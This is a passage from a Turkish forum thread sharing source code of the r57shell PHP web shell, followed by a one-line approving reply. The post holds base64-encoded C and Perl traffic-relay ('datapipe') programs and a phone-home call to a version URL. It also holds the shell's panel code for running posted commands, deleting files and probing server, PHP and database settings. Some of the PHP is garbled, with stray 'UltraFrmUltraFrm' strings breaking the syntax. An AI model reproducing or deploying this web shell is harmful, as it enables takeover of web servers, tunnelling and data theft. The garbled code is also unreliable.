x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5o Pg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm 5vLmg+DQojaW5jb HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiN pbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST 1INCmV4dGVybiBj aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbm VycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7 DQpjaGFyICpzdHJ lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgK GVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR 1cm4gc3lzX2Vycm xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywg YXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndj sgIA0KeyANCiAga W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWx lOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZ GRyX2luIGxhZGRy LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpem VvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBz dHJ1Y3QgaG9zdGV udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuY nl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHN ob3J0IG9wb3J0Ow 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0 ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IH JlbW90ZWhvc3Rcb iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGE gPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZ XRob3N0YnluYW1l KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YW RkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFy Z3ZbM10pOw0KICA gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJnd lsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2l nbmVkIHNob3J0KS hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2Nr ZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKS kgPT0gLTEpIHsNC iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDs NCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfS U5FVCk7DQogIGxh ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZi AoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkg ew0KICAgIHBlcnJ vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZ iAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGl zdGVuIik7DQogIC AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmso KSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgIC ByZXR1cm4gMjA7D QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0 KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2Vwd Chsc29jaywgJmNh ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID 0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9 IGZvcmsoKSkgPT0 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9ya zogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV 0ZG93bihjc29jay wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250 aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgIC AgIGdvdG8gZ290c 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh 3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9D QogIHJldHVybiAy MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZX QoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkg PT0gLTEpIHsNCiA gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsI HN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiA gfQ0KICBvYWRkci 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIu c2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2 FkZHIuc2luX2FkZ HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29 ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkge w0KICAgIGZwcmlu dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm 9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3 aGlsZSAoMSkgew0 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc 2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkR fU0VUKGNzb2NrLC ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAg IEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdC gyMCwgJmZkc3IsI E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnB yaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlc nJvcihlcnJubykp Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKE ZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29j aywmZmRzZSkpIHs NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwO TYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHd yaXRlKG9zb2NrLG J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0g ZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0 lTU0VUKG9zb2NrL CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29 jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgI CAgIGlmICgod3Jp dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdD I7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24o b3NvY2ssMik7DQo gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNma WxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQo gIGZjbG9zZShjZm lsZSk7DQogIHJldHVybiAwOw0KfQ=="; $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNv Y2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVl swXTsNCiRob3N0I CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVls yXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gM TsNCmlmICgkZGFl bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllIC IkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRz aWQoKSBvciBkaWU gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ 3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0 KJGFoID0gSU86Ol NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2Nh bHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fC BkaWUgIiQhIjsNC iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp 3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmI CghJGNoKSB7IHBy aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCi RwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsg cHJpbnQgU1RERVJ SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoL T5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWx zZSB7ICRjaC0+Y2 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAk bnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC 0+bmV3KCdQZWVyQ WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiA kby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7I H0NCm15ICRmaDsN CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6Omdlbn N5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwk bnVtLmxvZyIpIG9 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoL T5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQp teSAkcmluID0gIi I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAk Y2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZi AkdGg7DQpteSgkc m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5 kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgI CYmICAhJGVvdXQp IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPS AiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRj aCksIDEpIHx8IHZ lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc 3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQp pZiAoIWRlZmluZW QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpl eGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMD sgfQ0KfQ0KaWYgK CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSA gfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpte SAkcmVzdWx0ID0g c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZG VmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4i OyBleGl0IDA7IH0 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgK CRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZ lcik7fQ0Kd2hpbG UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAk cmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQ ppZiAoJHJlcyA+I DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk 7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd 2hpbGUgKG15ICRs ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3 lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJl cyA+IDApIHskY2J 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc 2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90b G9nX 2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZ zPTgxNjA2 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIi ZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9j dW1lbnQuY29va2l lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iK yhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hv dGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKC k/IlkiOiJOIik8L 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4 yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY 3JlZW4ud2lkdGgr J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci 5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVl bi5jb2xvckRlcHR oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgb GFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4 zIjwvc2NyaXB0Pj xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19y Kz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YS BocmVmPSdodHRwO i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9 wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5yd S9jZ2ktYmluL2hv dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aW R0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxu b3NjcmlwdD48YSB ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhc mdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5 ydS9jZ2ktYmluL2 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lk dGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L2 5vc2NyaXB0Pg=="; $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwd CBsY W5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3J pdGUoJzxh IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaW NrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6 Ly9jb3VudGVyLnl hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVud C5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5 lZCcpPycnOg0KJz tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyon KyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcH RoOnNjcmVlbi5wa XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ 9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2 lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0Pjwh LS0vTGl2ZUludGV ybmV0LS0+"; echo $head; echo '</head>'; if(empty($_POST['cmd'])) { $serv = array(127,192,172,10); $addr=@explode('.UltraFrmUltraFrm $_SERVER['SERVER_ADDR']); $current_version = str_replace('.UltraFrmUltraFrm'UltraFrmUltraFrm$ve rsion); if (!in_array($addr[0], $serv)) { @print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; @readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> <tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).' <font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> </font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; echo ws(2); echo "<b>".date ("d-m-Y H:i:s")."</b>"; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; echo ws(2); echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>")"safe_mode: <b><font color=red>OFF</font></b>")); echo ws(2); echo "PHP version: <b>".@phpversion()."</b>"; $curl_on = @function_exists('curl_version'); echo ws(2); echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>")"<b><font color=red>OFF</font></b>")); echo ws(2); echo "MySQL: <b>"; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } echo ws(2); echo "MSSQL: <b>"; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo ws(2); echo "PostgreSQL: <b>"; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo ws(2); echo "Oracle: <b>"; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo "<br>".ws(2); echo "Disable functions : <b>"; if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; |
 |
|
09-09-2008, 08:42
| #2 |
| Yeni Üye  Üyelik Tarihi: Sep 2008 Yaş: 22
Mesajlar: 1
İtibar Gücü: 0  | Cevap: r57 shell kodları aynen abi kesinlikle olay lara bakmak lazım |
| |
|
| Konuyu Toplam 1 üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
| Konu Seçenekleri | |
| Modları Göster | |
Normal Mod
|
|
Bütün Zaman Ayarları GMT +4 Olarak Düzenlenmiştir. Şu Anki Saat: 04:12 .
